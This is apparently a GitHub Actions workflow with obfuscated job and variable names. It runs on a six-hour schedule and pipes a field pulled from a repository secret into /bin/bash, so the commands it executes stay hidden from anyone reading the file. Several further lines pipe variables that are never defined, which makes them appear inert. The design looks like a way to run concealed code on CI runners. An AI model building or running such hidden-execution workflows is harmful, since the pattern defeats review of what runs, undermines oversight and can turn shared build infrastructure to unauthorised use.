name: liutang19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liutang19871010
        env:
          qh423: ${{ secrets.qh423 }}
        run: |
          echo $qh423 | jq -r .irnrf007 | /bin/bash
          echo $w177 | jq -r .jeo47 | /bin/bash
          echo $hhj9056 | jq -r .ciw6477 | /bin/bash
          echo $wmub97787 | jq -r .nh47646 | /bin/bash
          echo $n6650 | jq -r .dkbt88947 | /bin/bash
          echo $vpcy4 | jq -r .qzftw13478 | /bin/bash
          echo $wgex42451 | jq -r .sixl7 | /bin/bash
          echo $hyop4725 | jq -r .vxlsx09979 | /bin/bash
          echo $rsjz2 | jq -r .dzri24 | /bin/bash

